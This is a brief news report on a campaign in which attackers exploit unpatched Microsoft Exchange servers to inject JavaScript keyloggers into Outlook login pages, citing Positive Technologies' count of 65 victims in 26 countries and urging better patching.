In a disturbing new trend, hackers have been observed targeting Microsoft Exchange servers, exploiting vulnerabilities to inject malicious code that harvests user credentials. A recent report by Positive Technologies revealed that 65 victims across 26 countries have fallen prey to such attacks, continuing a campaign first documented in May 2024.
The cybercriminals are utilizing two distinct types of JavaScript keyloggers on the Outlook login pages. One variant saves stolen data to a file accessible via the internet, while the other transmits credentials to external servers. The impact of these attacks has been widespread, with victims including government agencies, banks, IT firms, and educational institutions.
Researchers identified numerous vulnerabilities being exploited, including the notorious ProxyShell and ProxyLogon flaws (CVE-2021-26855, CVE-2021-27065) among others. This approach allows the attackers to remain undetected while collecting sensitive information.
Despite these risks, many Microsoft Exchange servers still exposed to the internet remain unpatched. The alarming trend fits into a broader pattern of cyberattacks targeting entities in regions such as Africa and the Middle East, raising urgent questions about cybersecurity defenses globally. As threats like these proliferate, the need for robust security measures becomes increasingly critical.